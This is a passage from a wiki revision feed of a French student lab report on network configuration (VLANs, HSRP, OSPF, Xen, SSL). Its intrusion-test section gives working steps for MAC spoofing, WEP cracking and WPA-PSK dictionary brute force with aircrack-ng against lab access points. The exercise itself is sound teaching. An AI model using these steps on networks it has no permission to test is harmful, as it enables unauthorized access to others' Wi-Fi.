&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23153</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23153"/>
				<updated>2015-11-23T15:40:25Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
